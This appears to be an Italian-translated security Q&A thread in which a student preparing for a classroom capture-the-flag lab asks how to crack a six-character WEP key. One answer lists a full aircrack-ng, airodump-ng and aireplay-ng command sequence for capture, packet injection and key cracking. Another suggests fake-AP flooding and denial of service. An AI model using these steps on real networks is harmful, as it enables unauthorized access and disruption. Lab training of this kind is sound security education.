Tecniche di attacco alla sicurezza wireless

3

Prima di chiedere un consiglio, per favore non presumere che io sia un kiddie o un copione. Questo è per una delle mie classi di sicurezza wireless (CSS 1015).

È una lezione del sabato e solo 6 studenti sono in classe da quando inizia alle 8:30 AM alle 10:00. La prossima settimana stiamo facendo un laboratorio in cui portiamo switch e router e configuriamo gli AP in classe (lo chiamiamo CSS1015_1 e così via). Il professore ha detto che una squadra sarà la squadra di attacco e l'altra è la squadra di difesa. Il team di difesa avrà un piccolo file .txt dietro al proprio AP e il team di attacco dovrà crackare WEP e trovare quel file (lo chiama catturare la bandiera).

Voglio essere in testa al gioco quando si tratta di lezione la prossima settimana. Quali sono alcuni suggerimenti / trucchi che dovrei fare con il mio team di attacco? Poiché è la nostra prima volta, il WEP avrà una lunghezza di soli 6 caratteri.

    
posta davidS 12.03.2012 - 15:01
fonte

3 risposte

6

Esistono numerose risorse online, ma penso che potresti trovare le esercitazioni su Backtrack potrebbe essere il più utile. Puoi eseguire Backtrack su un cd live o come una VM sul tuo laptop. L'ulteriore vantaggio di Backtrack è che avrà anche gli strumenti per penetrare in qualunque host abbia la bandiera che stai cercando.

La maggior parte delle esercitazioni ti mostrerà come usare aircrack-ng , quindi conoscere questo lo strumento ti aiuterà molto.

Buona fortuna per l'esercizio!

    
risposta data 12.03.2012 - 15:55
fonte
5

Ottieni il backtrack 5 sul tuo PC, se non ti piace leggere, c'è un bel video di youtube qui

Dopo aver eseguito il backtrack, apri un terminale:

  • inserisci la tua scheda wifi in modalità monitoraggio: airmon-ng start wlan0
  • Ora inizia ad ascoltare gli AP con il tuo dispositivo di monitoraggio
  • airodump-ng mon0 (Ora cerca il canale e il BSSID)
  • airodump-ng -c 1 -b BSSID -w FILENAME mon0
  • Apri una nuova finestra di terminale
  • aireplay-ng -1 0 -a BSSID mon0
  • aireplay-ng -3 -b BSSID mon0

Ora rilassati e prenditi una coca, inizierà a correre, penso che il meglio sia aspettare circa 100.000 pacchi. Quindi interrompilo ed esegui:

aircrack-ng FILENAME.cap

Dopo alcuni secondi / minuti dovrebbe apparire la password.

Note:

  • BSSID è un indirizzo mac
  • Potrebbe essere il tuo numero di WLAN è diverso, quindi usa il comando ifconfig e scopri qual è la tua scheda wifi.
risposta data 12.03.2012 - 17:25
fonte
1

@davidS - Non riesco ancora a rispondere, ma sì un DDoS generalmente usa una botnet (rete di PC distribuiti). Ciò che il tuo professore probabilmente voleva dire è che puoi sentirti libero di fare l'AP.

Non funzionerebbe da quando lavori in una squadra, ma se ogni attaccante lavora separatamente potrebbe essere divertente. Dovresti essere in grado di ottenere la chiave WEP molto rapidamente se sei preparato. Poi ci sono molti modi per creare un AP.

Penso che il modo più divertente (che non influirebbe sulle altre comunicazioni wireless) sarebbe quello di far apparire tonnellate di AP falsi con SSID simili. (Http://rfakeap.tuxfamily.org/)

Ecco un elenco di possibili tecniche DoS: link

    
risposta data 13.03.2012 - 06:03
fonte

Leggi altre domande sui tag